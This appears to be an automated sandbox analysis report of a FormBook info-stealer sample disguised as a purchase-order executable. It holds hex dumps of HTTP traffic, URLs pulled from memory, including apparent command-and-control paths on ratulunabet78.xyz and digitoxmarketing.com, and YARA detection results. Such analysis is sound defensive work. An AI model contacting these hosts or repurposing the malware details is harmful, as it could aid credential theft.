19 ae 02 0c 48 68 73 d8 bd 64 f6 b6 66 56 f7 3e 7e 48 fa b2 a9 40 82 02 e4 25 3d 3e 1e e6 72 1d f3 f3 4d ad a9 a6 c2 a3 6b 0c 07 58 84 85 53 a5 d2 ea 5c 34 d4 3f 52 e9 18 4f a4 c3 7d bf 56 f5 dd f3 f3 e5 1c cc 9e 55 0f d3 7b 6f 41 45 05 94 12 d4 ae da 33 80 00 a2 4d 32 ed 20 53 5b 67 d6 af 2f b5 f2 3c 7b 39 fd e8 08 ca 67 4e be f4 7f 8d 6d ad 2c d6 b8 13 d6 80 45 b0 0b ea a2 09 82 5d ad 81 42 f7 bf d7 ea e5 ff 3b 26 80 8d 12 34 fd 31 33 1b 19 c5 84 aa 6e 5d f0 a4 27 a0 ee 1e a0 0e 40 1d 40 04 ea 00 62 dd aa 7b ef 7b 7a 92 7a d5 61 67 7b 62 dc dd e3 9e 14 7f 9e 75 48 19 1a 1a cf 8c c7 21 65 6a 02 34 e3 34 9f da c8 80 7d 33 63 ff 9f 99 96 e1 bd 47 ee 19 19 1b 1a 1f ae 22 5d 90 34 6e cf 40 d6 84 17 4a 41 fc ff af 0a 7e f7 4c 50 03 20 e8 19 32 68 98 a0 b9 90 69 2c 18 0c 4d 55 75 cf a0 7a e8 6a b0 6e 86 e7 06 6b 87 b2 03 ca 81 67 a2 e6 ae 0c 28 0b 9e 10 c8 f8 e8 42 05 09 29 e3 22 c8 b8 20 51 12 cf 12 32 90 f5 91 de 46 7a 0a 12 e5 b9 f3 fe 7f 4b 7d b9 e4 9f d6 10 0c 40 8d c2 fb de 1a dc 19 19 bc 55 da ac d2 46 0e 59 a5 8e 8c 56 ce 59 ed 2f da 5f 0b ab 87 a7 a0 ca 56 cc 09 ca 07 cc 88 84 05 83 4d 3a fc d0 d0 30 d0 00 c0 3c c6 04 ff 99 02 01 82 af 95 da 63 38 df 29 21 2a 9b a0 7b 3c 86 8a bb b7 6b 3c 88 88 80 8a 36 7b 0c d7 ff bd ca 1f 53 2c c4 9c a2 ec 2c c6 56 de 67 2a 91 4b ec 10 e2 63 4c aa 5b bf 66 08 22 22 d9 84 ec 39 b4 d2 fb 39 41 45 44 41 6c 37 c4 73 2c be f3 4e a1 87 9c 1b a6 bf b6 62 56 77 1f 83 18 12 0c a3 4d 6f 09 26 63 55 ed de fb 34 2a a0 80 02 49 aa 30 d3 8e 57 0b 58 7c e3 7d d8 b9 b6 99 be ea c2 0c 50 85 4f 8f c7 97 ac 1d b4 b6 4e 56 c7 d0 4e 56 cf d9 9c ad e1 c6 9b 8c 1c d7 3c 19 89 71 6d b9 e3 c6 a2 cb e0 cc f0 c3 37 de 24 f1 af f7 83 d7 48 94 76 64 fe aa df e5 f4 8f f5 3c Data Ascii: 708d=4"E]"rPH`?_caZz>|+g6B.Ii4gXHT^//rxHhsdfV>~H@%=>rMkXS\4?RO}VU{oAE3M2 S[g/<{9gNm,E]B;&413n]'@@b{{zzag{buH!ej44}3cG"]4n@JA~LP 2hi,MUuzj
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:38 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:19:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: openfiles.exe, 00000008.00000002.4441849151.000000000653C000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.000000000484C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEn
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000005BD0000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003EE0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: PO Copy_7854569.exe, 00000000.00000002.1985288574.000000000323D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: openfiles.exe, 00000008.00000002.4441849151.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2677536768.000000003A8FC000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4442575534.0000000005631000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ratulunabet78.xyz
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4442575534.0000000005631000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ratulunabet78.xyz/a42m/
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: openfiles.exe, 00000008.00000002.4441849151.0000000006086000.00000004.10000000.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440950107.0000000004396000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: openfiles.exe, 00000008.00000003.2570140522.0000000007A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: openfiles.exe, 00000008.00000002.4443750014.0000000007780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger
            Source: openfiles.exe, 00000008.00000002.4444082178.0000000007AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: PO Copy_7854569.exe, Program.csLarge array initialization: : array initializer size 665116
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, Program.csLarge array initialization: : array initializer size 665116
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0042AE13 NtClose,6_2_0042AE13
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672B60 NtClose,LdrInitializeThunk,6_2_01672B60
